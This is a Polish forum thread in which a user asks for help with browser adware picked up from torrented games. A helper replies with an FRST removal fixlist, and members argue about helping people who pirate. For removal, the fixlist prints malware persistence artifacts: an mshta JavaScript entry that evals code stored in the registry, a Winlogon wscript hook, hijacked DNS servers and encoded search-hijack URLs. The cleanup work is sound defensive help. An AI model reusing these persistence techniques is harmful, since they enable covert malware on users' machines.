volf13 utworzono 27 grudnia 2016 utworzono 27 grudnia 2016 Witam! Od przed wczoraj mam jakiś problem z notorycznymi reklamami które wyskakują przy odpalaniu chroma, ffoxa i najgorzej jest w iexplore. Korzystam z chroma głównie. Są to strony typu: CashBooster, TheProfitsMaker, podaj numer telefonu itp. otwierające się w mniej więcej równych odstępach czasowych. Miałem już kiedyś ten problem, ale drodzy forumowicze zaradzili :). Ogólnie to miałem jakąś agresywną stronę przez dluższy dsr-lte czy jakoś tak ale miałem ją tak długo, że jej adres z którym się łączyła wygasł :) (zawsze przy starcie przeglądarki się odpalała). Teraz pościągałem sobie jakieś gierki z torrentów i i zintegrowany launcher miał syfowe aplikacje tj. TrueKey i podejrzewam, że inne cuda. Zamieszczam w załączniku logi FRST. Pozdrawiam i liczę na pomoc :) FRST.txt Addition.txt
Gość komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 Dzień dobry, stawiasz mnie teraz w nie leda dylemacie, a za chwile może nastąpić niezręczna sytuacja. Powiadasz że podczas kradzieży danych poprzez sieć P2P oraz późniejszej instalacji nielegalnych treści - weszły Ci nielegalne programy O ironio losu! Mało tego, nie dość że okradłeś twórców, to teraz chcesz od nas porady (darmowej) , dotyczącej usuwania programów, które na ironię losu - okradają Ciebie. Proponuję za skradzione pieniądze udać się do serwisu, zaś post zgłaszam w trybie natychmiastowym do Administracji.
Twój_Anioł_Stróż komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 (edytowane) Ja uważam, że czym innym jest pomaganie w piractwie, a czym innym jest pomaganie w usuwanie infekcji. Pomaganie w piractwie jest karalne, a pomaganie w usuwaniu infekcji nie jest karalne. Trzeba to odróżniać. Lekarze pomagają rannym w wypadku, nawet gdy wiadomo, że ci ranni sami spowodowali wypadek. ========================== 1) Spróbuj odinstalować te programy: Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== UWAGA CleanBrowser (HKLM-x32\...\CleanBrowser) (Version: - ) <==== UWAGA MaohaWiFi (HKLM-x32\...\MaohaAP) (Version: 1.0.8.10 - 深圳市猫ĺ“网络科技发展有é™ĺ…¬ĺʏ) <==== UWAGA mpck version 1.1 (HKLM-x32\...\mobilepcstarterkit_is1) (Version: 1.1 - mobilepcstarterkit) <==== UWAGA Note-up (HKLM-x32\...\Note-up) (Version: - Note-up) <==== UWAGANote-UP (HKLM-x32\...\NUIns) (Version: - QUAHOG LIMITED) <==== UWAGA ProxyGate version 3.0.0.1176 (HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\{1EC095EE-8CA3-43D6-B9F5-0C55B82ED3D7}}_is1) (Version: 3.0.0.1176 - Gold Click Ltd) <==== UWAGA shopperz (HKLM-x32\...\{4C8A612C-8ABC-4798-8317-E17DA81E76B8}) (Version: 2.0.0.480 - shopperz) <==== UWAGA SnapDo (HKLM-x32\...\{C12D618B-5C0C-4395-A68E-8159EDCFD377}) (Version: 1.0.0.0 - Resoft) <==== UWAGA trotux - Uninstall (HKLM-x32\...\{E7E3C792-3E27-454C-BEA0-FF6062383548}) (Version: - ) <==== UWAGA 2) Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\Program Files (x86)\UCBrowser RemoveDirectory: C:\Program Files (x86)\Maoha RemoveDirectory: C:\Program Files\Jidd RemoveDirectory: C:\ProgramData\Ronzap RemoveDirectory: c:\program files\safiplayer RemoveDirectory: C:\Users\laska\AppData\Roaming\JucdiJhnoz RemoveDirectory: c:\program files (x86)\ldsgamecenter RemoveDirectory: c:\program files (x86)\ludashi RemoveDirectory: C:\Users\laska\AppData\Roaming\Xeeedxi RemoveDirectory: c:\program files (x86)\covotainpregoly RemoveDirectory: C:\Users\laska\AppData\Local\4C4C4544-1482834532-3010-8053-B3C04F535131 RemoveDirectory: C:\Program Files (x86)\mpck RemoveDirectory: C:\Program Files (x86)\Wkorycootusp RemoveDirectory: C:\ProgramData\Logic Handler RemoveDirectory: C:\Program Files (x86)\wanttoxiameng RemoveDirectory: C:\Program Files (x86)\Note-up RemoveDirectory: C:\Users\laska\AppData\Local\Ucmedia RemoveDirectory: C:\Users\laska\AppData\Roaming\ProxyGate RemoveDirectory: C:\Users\laska\AppData\Local\Estion RemoveDirectory: C:\Program Files\PCDApp RemoveDirectory: C:\Program Files (x86)\Courkaripack Center RemoveDirectory: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\360bizhi RemoveDirectory: C:\Program Files\NQI142SK0I RemoveDirectory: C:\Users\laska\AppData\Local\app RemoveDirectory: C:\Users\laska\AppData\Roaming\Note-UP RemoveDirectory: C:\Users\laska\AppData\Local\tuto_monetize_120161226 C:\Users\laska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UC浏览器 C:\Users\laska\AppData\LocalLow\Company C:\Users\laska\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} C:\Users\laska\AppData\Local\Tempfolder C:\uninst C:\Program Files\JiddUn C:\Program Files (x86)\360 C:\Users\laska\AppData\Roaming\Ludashi C:\Users\laska\AppData\Roaming\lockhomepage C:\ProgramData\WindowsMsg C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师 C:\ProgramData\service.exe C:\TOSTACK ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF% ShortcutWithArgument: C:\Users\laska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://kipuu.cn/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://kipuu.cn/ WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Task: {EFC97DC0-6A9A-4FD4-BE4C-D82E66405AB0} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-17] (UCWeb Inc) <==== UWAGA Task: {E2B2BD50-C852-4D43-9F58-A4B05FB3EEF1} - System32\Tasks\{9AC6F47D-F25D-43EE-BE48-19DB50EE5184} => pcalua.exe -a E:\setup.exe -d E:\ Task: {EA2687B5-134A-4BDE-B421-9CAFBB9A1968} - System32\Tasks\Anifkplijerck Verfier => C:\Program Files (x86)\Wkorycootusp\kisught.exe [2016-12-27] (Glarysoft Ltd) Task: {98929E17-24BF-4A96-BC42-5053B21A3EF3} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-17] (UCWeb Inc) <==== UWAGA Task: {6E236B59-DE40-4982-8B0D-DB55CADFC2B0} - System32\Tasks\{A6D1B138-B703-46FE-A1F2-A89959E7506E} => pcalua.exe -a "C:\Users\laska\Downloads\command and conquer - red alert 2 (full game).exe" -d "C:\Program Files (x86)\Mozilla Firefox" Task: {74FC9E09-8479-4EDF-995F-EF732321FB98} - System32\Tasks\{A7A7946E-5CB9-4C5F-8A11-45C20868F9DA} => pcalua.exe -a "C:\Games\Red Alert 2\YURI-1001-ENGLISH.EXE" -d "C:\Games\Red Alert 2" Task: {273D2210-4A35-4714-A8FC-AA04A885B89F} - System32\Tasks\osTip => Chrome.exe <==== UWAGA Task: {07E3B1AA-74FF-4528-8373-6FCBF02CF75E} - System32\Tasks\{09F7A2F9-0693-4758-9928-8D666C9FFB84} => pcalua.exe -a "G:\etc\To do list\regcleaner_4.3.exe" -d "G:\etc\To do list" CustomCLSID: HKU\S-1-5-21-577603492-3380774668-2593261613-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\laska\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => Brak pliku CustomCLSID: HKU\S-1-5-21-577603492-3380774668-2593261613-1000_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-577603492-3380774668-2593261613-1000_Classes\CLSID\{7DE1BE5C-CEBA-4F1D-ACBC-9CE11EE9A2A1}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-577603492-3380774668-2593261613-1000_Classes\CLSID\{BD0DEB94-63DB-4392-9420-6EEE05094B1F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-577603492-3380774668-2593261613-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2014\en-US\acadficn.dll => Brak pliku HKLM\...\Run: [WINCOMP87] => C:\Program Files (x86)\mpck\wincom_P87.exe [4413952 2016-12-27] () HKLM-x32\...\Run: [Note-up] => C:\Program Files (x86)\Note-up\note-up.exe [6772736 2015-10-09] (TODO: <Company name>) <===== UWAGA HKLM-x32\...\Run: [app] => C:\Program Files (x86)\wanttoxiameng\uc.exe [301420 2016-12-20] ( ) HKLM\...\RunOnce: [OTUTPRODUCT_359X3] => C:\Program Files (x86)\mpck\L6TJSW.exe [485376 2016-12-27] (DR) <===== UWAGA HKLM\...\RunOnce: [OMEWPRODUCT_CAHK6] => C:\Windows\Temp\OXE0EDREZS.exe [486912 2016-12-27] (DR) <===== UWAGA HKLM\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs, HKLM-x32\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs, [X] HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [] => [X] C:\Windows\run.vbs, HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [Ucmedia] => C:\Users\laska\AppData\Local\Ucmedia\gdc86.exe [117561 2016-12-27] () HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [Estion] => regsvr32.exe C:\Users\laska\AppData\Local\Estion\wxpzlib.dll <===== UWAGA HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [ProxyGate] => C:\Users\laska\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== UWAGA HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [msiql] => C:\Windows\Temp\00016688\msiql.exe [2045952 2016-12-27] () <===== UWAGA HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [AQworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\laska\AppData\Local\Ucmedia\wxpzlib.dll HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\chrome.exe [7204864 2016-12-06] () HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [svchost0] => "C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe"\UUC0789.exe HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Run: [apphide] => C:\Program Files (x86)\wanttoxiameng\uc.exe [301420 2016-12-20] ( ) HKU\S-1-5-21-577603492-3380774668-2593261613-1000\...\Policies\Explorer: [] HKU\S-1-5-18\...\Run: [svchost0] => "C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe"\UUC0789.exe HKU\S-1-5-18\...\Run: [HKISJMN9R8] => C:\Windows\Temp\3UK41OL5NZ\caster.exe [369152 2016-12-27] () <===== UWAGA HKU\S-1-5-18\...\Run: [9VWRXO687Y] => C:\Program Files\NQI142SK0I\NQI142SK0.exe [369152 2016-12-27] () HKU\S-1-5-18\...\Run: [apphide] => C:\Program Files (x86)\wanttoxiameng\uc.exe [301420 2016-12-20] ( ) HKU\S-1-5-18\...\Run: [ComputerZ-Tray] => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe [2977704 2016-12-12] () HKU\S-1-5-18\...\Run: [360wp-srv] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\360bizhi\360wpsrv.exe [1636264 2016-12-09] (360.cn) HKLM\...\Providers\os9m9brr: C:\Program Files (x86)\Courkaripack Center\local64spl.dll [292352 2016-12-27] () AppInit_DLLs: C:\ProgramData\Ronzap\Sumnimin.dll => C:\ProgramData\Ronzap\Sumnimin.dll [358912 2016-12-27] () AppInit_DLLs-x32: C:\ProgramData\Ronzap\Zumtip.dll => C:\ProgramData\Ronzap\Zumtip.dll [248320 2016-12-27] () Tcpip\..\Interfaces\{354F5905-B6F5-4494-A791-F5EABC4185F9}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{63E6F0C6-4303-4865-A3A3-9C0250249923}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{9B644F01-3AEB-44F1-8AE7-8AB26A157605}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{AAD0D319-A6A1-4A52-A04D-C3BD5BC1AFB0}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{B5922951-9BCF-4756-9497-F0B1785C93D4}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{B70C823F-2868-4530-A766-CDE669D77A3E}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{D7AA0D03-A8D9-4419-B0AC-5C0CB15B8F04}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{D7C40C49-1BDA-4486-B41F-0CE595415E44}: [NameServer] 104.197.191.4 HKU\S-1-5-21-577603492-3380774668-2593261613-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPn6ySh_Hgj2SHyxD2_hkKmInaq56rK2rSrYFYd8WWGxkoAWKK8eNubaqiP_LSwQoAf9Zm_JAaYzZ0N6nzmnyS1Q0OWL&q={searchTerms} HKU\S-1-5-21-577603492-3380774668-2593261613-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPV0G85LcwChAe7CmDFx3dTTLutq_X1rK7DzK7wySwvEAKD8uE1_fKXGqzzofVwmEVtgx8QuLCRDxU9-x5nalxsodTlM SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPn6ySh_Hgj2SHyxD2_hkKmInaq56rK2rSrYFYd8WWGxkoAWKK8eNubaqiP_LSwQoAf9Zm_JAaYzZ0N6nzmnyS1Q0OWL&q={searchTerms} SearchScopes: HKU\S-1-5-21-577603492-3380774668-2593261613-1000 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPn6ySh_Hgj2SHyxD2_hkKmInaq56rK2rSrYFYd8WWGxkoAWKK8eNubaqiP_LSwQoAf9Zm_JAaYzZ0N6nzmnyS1Q0OWL&q={searchTerms} BHO: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql64.dll [2016-12-27] () BHO-x32: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql.dll [2016-12-27] () BHO-x32: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~2\ALLPLA~1\Iplex\IPLEXT~1.DLL => Brak pliku FF user.js: detected! => C:\Users\laska\AppData\Roaming\Mozilla\Firefox\Profiles\bhm1zpp8.default\user.js [2016-12-27] FF NewTab: Mozilla\Firefox\Profiles\bhm1zpp8.default -> C:\\ProgramData\\Ronzaps\\ff.NT FF SelectedSearchEngine: Mozilla\Firefox\Profiles\bhm1zpp8.default -> Yahoo! Search FF Homepage: Mozilla\Firefox\Profiles\bhm1zpp8.default -> C:\\ProgramData\\Ronzaps\\ff.HP FF SearchPlugin: C:\Users\laska\AppData\Roaming\Mozilla\Firefox\Profiles\bhm1zpp8.default\searchplugins\keepmysearch.xml [2014-07-12] FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\findit.xml [2016-12-27] FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml [2014-07-07] FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Brak pliku] CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPnh0u1QS36--r5aK7YkXYm5GHWhJLsgstGF8teXXUSHtIJvhQXfWZix82T1F3LMe30w8VXqcU0SKB_jPkzNr5oRqJMY CHR StartupUrls: Default -> "hxxp://rts.dsrlte.com" CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjClGjXKT-KCHCaZenadUbnyz9gFVKpeVUEl2mxASiSnaZ_wq_Nl5eHK1MYK3udrVxPntbMByBn9K54PreHifxuycO5AGiWafGc195GlOrqH25nONih8vL9ADPJoU6A7a93RBRXbfhkbYONpJU9I5H6MOXGyj&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR Extension: (SafeFinder Search) - C:\Users\laska\AppData\Local\Google\Chrome\User Data\Default\Extensions\jidkebcigjgheaahopdnlfaohgnocfai [2016-10-12] R2 39785243-D64E-4E6A-8D47-8AE3346905B2; C:\Program Files\Jidd\Unokucu.exe [273920 2016-12-27] () [Brak podpisu cyfrowego] R2 Anerbege; C:\Program Files (x86)\Covotainpregoly\shequseBuilder.dll [180736 2016-12-27] () [Brak podpisu cyfrowego] R2 backlh; C:\ProgramData\Logic Handler\set.exe [2088448 2016-04-26] () [Brak podpisu cyfrowego] R2 Cegoe; C:\Users\laska\AppData\Roaming\Xeeedxi\Xeeedxi.exe [170496 2016-12-04] () [Brak podpisu cyfrowego] s2 doanload; C:\Windows\system32\config\systemprofile\AppData\Local\Vaiaholding.exe [4608 2016-12-27] () [Brak podpisu cyfrowego] C:\Windows\system32\config\systemprofile\AppData\Local\Vaiaholding.exe R2 GmSvc; C:\Program Files (x86)\LDSGameCenter\GmSvc.dll [463272 2016-11-04] () R2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [252328 2016-11-18] () <==== UWAGA R2 Ilaaugca; C:\Users\laska\AppData\Roaming\JucdiJhnoz\Rawei.exe [121344 2016-12-04] () [Brak podpisu cyfrowego] R2 Jidd Updater; C:\Program Files\Jidd\Vestie.exe [255488 2016-12-27] () [Brak podpisu cyfrowego] R2 KarxMhfonki; C:\Program Files\Jidd\KarxMhfonki.exe [1684992 2016-12-27] () [Brak podpisu cyfrowego] R2 MaohaWifiSvr; C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe [168992 2016-11-26] (深圳市猫哈网络科技发展有限公司) R2 Ronzap; C:\ProgramData\\Ronzap\\Ronzap.exe [629760 2016-12-27] () [Brak podpisu cyfrowego] R2 SaFiSvc; C:\Program Files\SaFiPlayer\SaFiSvc.dll [324336 2016-12-20] () R2 vezozode; C:\Program Files (x86)\4C4C4544-1482802499-3010-8053-B3C04F535131\knsD6C5.tmp [408064 2016-12-27] () [Brak podpisu cyfrowego] R2 WpSvc; C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\360bizhi\lpi\WpSvc.dll [253352 2016-11-17] () R2 zigipyro; C:\Users\laska\AppData\Local\4C4C4544-1482834532-3010-8053-B3C04F535131\qnsx22DD.tmp [158720 2015-12-26] () [Brak podpisu cyfrowego] S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe -originalversion 4.4.127.0 [X] S2 MaintainerSvc2.35.7151888; "C:\ProgramData\46a7822e-e081-4280-9f6b-e4649130bea1\maintainer.exe" [X] R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [82336 2016-12-27] (Cherimoya Ltd) <==== UWAGA C:\Windows\System32\drivers\cherimoya.sys R1 MaohaWifiNetPro; C:\Program Files (x86)\Maoha\MaohaAP\MaoHaWiFiNet64.sys [1030496 2016-11-26] () R1 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [80850 ] (UC Web Inc.) <==== UWAGA U3 mbr; \??\C:\Users\laska\AppData\Local\Temp\mbr.sys [X] FirewallRules: [{F5C8B29F-CA2F-4DCA-ADAA-9C2485636A2A}] => C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe FirewallRules: [{08D0D65D-DD1E-4ADE-8538-98CB939B5B53}] => C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe FirewallRules: [{D6C62DF3-95EF-4DCA-8A81-C1E69123326F}] => C:\Program Files\PCDApp\dgen.exe FirewallRules: [{EDCFB01D-30EB-4B00-B874-2CF9AF2422D5}] => C:\Program Files\PCDApp\dgen.exe FirewallRules: [TCP Query User{1CBB2C22-2E2A-4074-BA2A-416D39934416}C:\users\laska\appdata\local\akamai\netsession_win.exe] => C:\users\laska\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{81F77582-D1B4-42BB-9CC9-F2C392D01B2B}C:\users\laska\appdata\local\akamai\netsession_win.exe] => C:\users\laska\appdata\local\akamai\netsession_win.exe FirewallRules: [{02B4AB90-F550-473C-9AC2-C81FE50F0DC5}] => C:\Users\laska\AppData\Local\Akamai\netsession_win.exe FirewallRules: [{8521BF68-E75F-492E-8828-5A49FB8F0DED}] => C:\Users\laska\AppData\Local\Akamai\netsession_win.exe HKU\.DEFAULT\Software\Classes\c62ff8ad: "C:\Windows\system32\mshta.exe" "javascript:BLr5h7tK="ik2Cd4";J93X=new ActiveXObject("WScript.Shell");k4I9cMOFB="R0ogT";eafq1=J93X.RegRead("HKCU\\software\\owcgmvsyo\\jeujos");qh4Ns4g="XOMCL";eval(eafq1);rGlxkJ0="KoyMk";" <===== UWAGA AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [80850] AlternateDataStreams: C:\Windows\system32\drivers:x64 [360536] AlternateDataStreams: C:\Windows\system32\drivers:x86 [1156450] C:\Users\laska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UC浏览器.lnk 2016-12-27 02:33 - 2016-12-27 02:33 - 0000004 _____ () C:\Users\laska\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat 2016-04-28 16:33 - 2016-04-28 16:33 - 6494208 _____ () C:\Users\laska\AppData\Roaming\agent.dat 2016-04-28 16:33 - 2016-04-28 16:33 - 0065232 _____ () C:\Users\laska\AppData\Roaming\Config.xml 2016-04-28 16:33 - 2016-04-28 16:33 - 2279053 _____ () C:\Users\laska\AppData\Roaming\Duo-Top.bin 2016-04-28 16:33 - 2016-04-28 16:33 - 0934400 _____ () C:\Users\laska\AppData\Roaming\Hotfresh.exe 2016-04-28 16:33 - 2016-04-28 16:33 - 1626652 _____ () C:\Users\laska\AppData\Roaming\Hotfresh.tst 2016-04-28 16:33 - 2016-04-28 16:33 - 0013680 _____ () C:\Users\laska\AppData\Roaming\InstallationConfiguration.xml 2016-04-28 16:33 - 2016-04-28 16:33 - 0127488 _____ () C:\Users\laska\AppData\Roaming\Installer.dat 2016-04-28 16:33 - 2016-04-28 16:33 - 0018432 _____ () C:\Users\laska\AppData\Roaming\Main.dat 2016-04-28 16:33 - 2016-04-28 16:33 - 0005568 _____ () C:\Users\laska\AppData\Roaming\md.xml 2016-04-28 16:33 - 2016-04-28 16:33 - 0126464 _____ () C:\Users\laska\AppData\Roaming\noah.dat 2016-04-28 16:34 - 2016-04-28 16:34 - 0032038 _____ () C:\Users\laska\AppData\Roaming\uninstall_temp.ico HOSTS: EmptyTemp: >>Menu Notatnika >> Plik >> >>Zapisz jako >> Nazwa pliku: fixlist Zapisz jako typ: Dokumenty tekstowe Kodowanie: UTF -8 >>Zapisz Plik umieść w folderze C:\Users\laska\Downloads Uruchom FRST i kliknij przycisk Fix (NAPRAW). 3) Użyj >Adw-cleaner najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego. Pokaż raport z niego "C". 4) Zrób nowe logi FRST. przed skanem zaznacz: Additional.txt Shortcut.txt, .
Gość komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 Mam prostą zasadę, złodziejom nie pomagam. Co innego jest pomoc rannemu, a co innego osobie która odczuwa następstwa swoich czynów z powodu pazerności. Równie dobrze można wszystko sprowadzić do ad Hitlerum lub ad Stalinum. Porównanie które użyłeś jest dla mnie co najmniej mocno nie smaczne.
Twój_Anioł_Stróż komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 Gdyby wszyscy myśleli tak samo, jak Ty, to na żadnym forum nikt nie udzielał by pomocy zawirusowanym, bo większość tych infekcji powstała przy okazji piractwa. Popatrz sam na różne fora,- tam wszędzie w takich przypadkach jest udzielana pomoc. Wszystkie firmy antywirusowe, np. Kaspersky, Avira, Avast, ESET, MBAM, itp - też udzielają pomocy takim zawirusowanym. I nikomu nawet przez myśl nie przejdzie, że te firmy wspomagają piractwo. Trzeba umieć to odróżnić. .
volf13 komentarz 27 grudnia 2016 Autor komentarz 27 grudnia 2016 (edytowane) Nie wiem czy kradzieżą mogę nazwać ściąganie Oddworlds Abe Exoddus który kupiłem 18 lat temu i gierek które mam na krążkach w piwnicy takich jak AeE 2, red alert 2 więc proszę nie wyciągać konsekwencji bez rozpoznania :) Zaraz coś pomyślę, dzięki!
Gość komentarz 27 grudnia 2016 komentarz 27 grudnia 2016 Z tego co wiem, to nie są abadonware ani freeware, zatem wnioski jak najbardziej słuszne. Skoro leżą w piwnicy, a są zainstalowane i grywalne, to znaczy że klucz jest kradziony. Nie ma co się tłumaczyć, bo jest to bez celu. Druga rzecz @Twój_Anioł_Stróż, jakby nikt im nie pomagał, to by może się nauczyli że za głupotę się płaci - płaci i to nie małe pieniądze w serwisie
volf13 komentarz 27 grudnia 2016 Autor komentarz 27 grudnia 2016 Ściąganie gier do których posiadam oryginalną kopie nie jest przestępstwem ani wykroczeniem, nie rozumiem skąd ten problem. Hmm chyba pomogło Nic nie wyskakuje i nie odpalają mi się okienka. Zamieszczam logi Addition.txt Shortcut.txt FRST.txt
